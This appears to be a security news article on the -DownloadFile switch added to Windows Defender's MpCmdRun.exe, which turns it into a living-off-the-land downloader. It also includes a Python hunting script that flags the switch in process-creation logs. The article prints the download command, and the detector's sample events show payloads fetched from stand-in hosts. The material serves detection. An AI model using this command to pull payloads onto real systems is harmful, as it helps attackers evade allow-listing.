Windows Defender has gained a new command-line feature, and security researchers are not happy about it: it increases the attack surface of Windows.
Version 4.18.2007.9 or 4.18.2009.9 of the Antimalware Client added a -DownloadFile switch to its command-line utility, MpCmdRun.exe, so the following command now fetches an arbitrary file, binaries included, from the internet and writes it to the given path:
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
While not an exploit in itself, the feature turns MpCmdRun.exe into another so-called living-off-the-land binary, or LOLBin: a script that already has command-line execution on a machine can use this signed, trusted Microsoft binary to pull further files from the internet, rather than bringing its own downloader that application allow-listing or download monitoring might flag.
Adding the feature to Windows Defender means there is another binary admins have to keep an eye on and another binary attackers can abuse.
Fortunately, Windows Defender still scans the files it downloads this way, but that scan is of course not infallible.
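The check a defender would want alongside this news is a hunt over process-creation telemetry for MpCmdRun.exe launched with the new switch. The following is an added example, not code from the article, from the researcher, or from Microsoft: it runs over records shaped like Sysmon Event ID 1 or Security event 4688 (with command-line auditing enabled), matches MpCmdRun.exe by image basename or by the PE OriginalFileName so a renamed copy is not missed, and extracts the URL and destination path from the -DownloadFile invocation. The sample records, paths and Platform folder version are constructed for the example, and the OriginalFileName value "MpCmdRun.exe" is assumed.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed process-creation records (Sysmon Event ID 1 / Security 4688 style).
# Not real telemetry: paths, the Platform folder version and the host details are
# made up for the example; OriginalFileName == "MpCmdRun.exe" is an assumption.
SAMPLE_EVENTS = [
    {   # routine scan: MpCmdRun used legitimately, must NOT alert
        "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 2',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
    },
    {   # the download switch, launched from cmd.exe with unquoted arguments
        "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2009.9-0\MpCmdRun.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": r"MpCmdRun.exe -DownloadFile -url https://example.invalid/stage2.bin -path C:\Users\Public\stage2.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
    {   # renamed copy, lower-case switches, quoted destination containing a space
        "Image": r"C:\Users\bob\AppData\Local\Temp\svc.exe",
        "OriginalFileName": "MpCmdRun.exe",
        "CommandLine": r'svc.exe -downloadfile -url http://203.0.113.5/a.txt -path "C:\Users\bob\AppData\Local\Temp\a b.dll"',
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    },
    {   # unrelated process whose command line merely mentions the switch: must NOT alert
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": r'powershell.exe -Command "Write-Host MpCmdRun.exe -DownloadFile is now a LOLBin"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
]

_TOKEN_RE = re.compile(r'"([^"]*)"|(\S+)')


def tokenize(cmdline: str) -> list:
    """Split a Windows command line into arguments, honouring double quotes.
    Deliberately simple: sufficient for MpCmdRun's flag/value syntax."""
    return [m.group(1) if m.group(1) is not None else m.group(2)
            for m in _TOKEN_RE.finditer(cmdline)]


@dataclass
class Finding:
    image: str
    parent_image: str
    url: Optional[str]
    dest: Optional[str]


def is_mpcmdrun(event: dict) -> bool:
    """Match on the image basename and on OriginalFileName (the PE version
    resource Sysmon records), so a copied-and-renamed binary still matches."""
    basename = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    original = event.get("OriginalFileName", "").lower()
    return basename == "mpcmdrun.exe" or original == "mpcmdrun.exe"


def detect_download(event: dict) -> Optional[Finding]:
    """Return a Finding when the event is MpCmdRun.exe run with -DownloadFile,
    else None. Switch names are compared case-insensitively."""
    if not is_mpcmdrun(event):
        return None
    tokens = tokenize(event.get("CommandLine", ""))
    lowered = [t.lower() for t in tokens]
    if "-downloadfile" not in lowered:
        return None

    def value_after(flag: str) -> Optional[str]:
        for i, tok in enumerate(lowered):
            if tok == flag and i + 1 < len(tokens):
                return tokens[i + 1]
        return None

    return Finding(
        image=event.get("Image", ""),
        parent_image=event.get("ParentImage", ""),
        url=value_after("-url"),
        dest=value_after("-path"),
    )


def scan(events) -> list:
    """Run the detection over a batch of events and keep the hits."""
    return [f for f in map(detect_download, events) if f is not None]


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"ALERT MpCmdRun download: {f.url} -> {f.dest} (parent: {f.parent_image})")
```

The same logic maps directly onto a SIEM or Sysmon rule: image basename or OriginalFileName equals MpCmdRun.exe and the command line contains -DownloadFile. Interactive administrators rarely have a reason to use this switch, so alerting on every occurrence is reasonable, with the parent process and destination path as the first triage clues.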
The new “feature” was discovered by security researcher Mohammad Askar and verified by BleepingComputer.